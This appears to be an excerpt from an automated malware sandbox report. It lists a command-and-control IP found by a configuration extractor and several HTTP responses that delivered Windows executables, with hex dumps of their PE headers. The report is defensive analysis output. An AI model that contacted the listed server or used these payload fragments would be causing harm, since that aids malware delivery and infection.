Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:52:19 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 01 Nov 2024 04:00:31 GMTConnection: keep-aliveETag: "6724525f-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 6b 78 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 66 79 65 73 72 79 79 00 20 2a 00 00 a0 00 00 00 06 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 77 6e 74 75 69 6c 70 00 20 00 00 00 c0 2a 00 00 04 00 00 00 40 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:52:26 GMTContent-Type: application/octet-streamContent-Length: 1917440Last-Modified: Fri, 01 Nov 2024 04:44:30 GMTConnection: keep-aliveETag: "67245cae-1d4200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 83 94 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e4 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c e4 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 77 7a 76 68 70 67 00 30 1a 00 00 c0 31 00 00 26 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 75 78 78 6c 66 7a 77 00 10 00 00 00 f0 4b 00 00 04 00 00 00 1c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:07 GMTContent-Type: application/octet-streamContent-Length: 3027456Last-Modified: Fri, 01 Nov 2024 04:44:09 GMTConnection: keep-aliveETag: "67245c99-2e3200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 40 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 31 00 00 04 00 00 1c 39 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 78 63 77 62 66 6c 79 00 80 2b 00 00 b0 05 00 00 78 2b 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6b 6d 78 78 64 69 61 00 10 00 00 00 30 31 00 00 04 00 00 00 0c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 31 00 00 22 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:14 GMTContent-Type: application/octet-streamContent-Length: 2154496Last-Modified: Fri, 01 Nov 2024 04:44:22 GMTConnection: keep-aliveETag: "67245ca6-20e000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 90 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 73 00 00 04 00 00 f4 94 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 67 64 78 72 67 6b 00 30 1a 00 00 50 59 00 00 2e 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 67 7a 72 67 6e 75 73 00 10 00 00 00 80 73 00 00 06 00 00 00 b8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 73 00 00 22 00 00 00 be 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:19 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Fri, 01 Nov 2024 04:00:04 GMTConnection: keep-aliveETag: "67245244-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c 52 24 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 dc bc 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:25 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:28 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 01 Nov 2024 04:00:31 GMTConnection: keep-aliveETag: "6724525f-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 6b 78 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 66 79 65 73 72 79 79 00 20 2a 00 00 a0 00 00 00 06 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 77 6e 74 75 69 6c 70 00 20 00 00 00 c0 2a 00 00 04 00 00 00 40 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
